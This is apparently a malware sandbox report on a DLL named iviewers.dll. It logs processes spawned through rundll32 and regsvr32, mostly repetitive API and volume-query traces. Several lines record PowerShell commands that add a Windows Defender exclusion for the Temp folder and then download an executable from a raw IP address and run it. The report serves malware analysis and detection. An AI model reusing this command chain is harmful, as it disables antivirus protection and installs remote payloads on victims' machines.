Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe

Code function: 26_2_00007FF62188B420 ShellExecuteW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

26_2_00007FF62188B420

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\t0ppkxxj.rwu.exe'"	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\Temp\t0ppkxxj.rwu.exe "C:\Windows\Temp\t0ppkxxj.rwu.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\ochicikt.z2z.exe'"	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\Temp\ochicikt.z2z.exe "C:\Windows\Temp\ochicikt.z2z.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\inyligbs.qlq.exe'"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\Temp\inyligbs.qlq.exe "C:\Windows\Temp\inyligbs.qlq.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\5mg21dmq.1jt.exe'"	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\Temp\5mg21dmq.1jt.exe "C:\Windows\Temp\5mg21dmq.1jt.exe"	Jump to behavior

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe

Code function: 26_2_00007FF6218BDF10 cpuid

26_2_00007FF6218BDF10

Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: GetLocaleInfoW,	26_2_00007FF6218B9310
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: GetLocaleInfoEx,FormatMessageA,	26_2_00007FF6218CB170
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: GetLocaleInfoW,	26_2_00007FF6218B9518
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	26_2_00007FF6218B9468
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	26_2_00007FF6218B964C
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: EnumSystemLocalesW,	26_2_00007FF6218ADAE0
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,	26_2_00007FF6218B8C04
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	26_2_00007FF6218B90C8
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: EnumSystemLocalesW,	26_2_00007FF6218B9030
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: GetLocaleInfoW,	26_2_00007FF6218AE020
Source: C:\Windows\Temp\t0ppkxxj.rwu.exe	Code function: EnumSystemLocalesW,	26_2_00007FF6218B8F60
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: EnumSystemLocalesW,	27_2_00007FF741ADDAE0
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: GetLocaleInfoEx,FormatMessageA,	27_2_00007FF741AFB170
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	27_2_00007FF741AE9468
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,	27_2_00007FF741AE8C04
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	27_2_00007FF741AE964C
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: EnumSystemLocalesW,	27_2_00007FF741AE9030
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: GetLocaleInfoW,	27_2_00007FF741ADE020
Source: C:\Windows\Temp\ochicikt.z2z.exe	Code function: EnumSystemLocalesW,	27_2_00007FF741AE8F60
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: EnumSystemLocalesW,	28_2_00007FF7CEF09030
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: EnumSystemLocalesW,	28_2_00007FF7CEF08F60
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: GetLocaleInfoW,	28_2_00007FF7CEEFE020
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	28_2_00007FF7CEF0964C
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	28_2_00007FF7CEF09468
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,	28_2_00007FF7CEF08C04
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: EnumSystemLocalesW,	28_2_00007FF7CEEFDAE0
Source: C:\Windows\Temp\inyligbs.qlq.exe	Code function: GetLocaleInfoEx,FormatMessageA,	28_2_00007FF7CEF1B170
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: EnumSystemLocalesW,	29_2_00007FF786AC8F60
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: EnumSystemLocalesW,	29_2_00007FF786AC9030
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: GetLocaleInfoW,	29_2_00007FF786ABE020
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	29_2_00007FF786AC964C
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,	29_2_00007FF786AC8C04
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	29_2_00007FF786AC9468
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: GetLocaleInfoEx,FormatMessageA,	29_2_00007FF786ADB170
Source: C:\Windows\Temp\5mg21dmq.1jt.exe	Code function: EnumSystemLocalesW,	29_2_00007FF786ABDAE0

Source: C:\Windows\System32\loaddll32.exe	Queries volume information: C:\Users\user\Desktop\iviewers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Queries volume information: C:\Users\user\Desktop\iviewers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\Desktop\iviewers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\Desktop\iviewers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
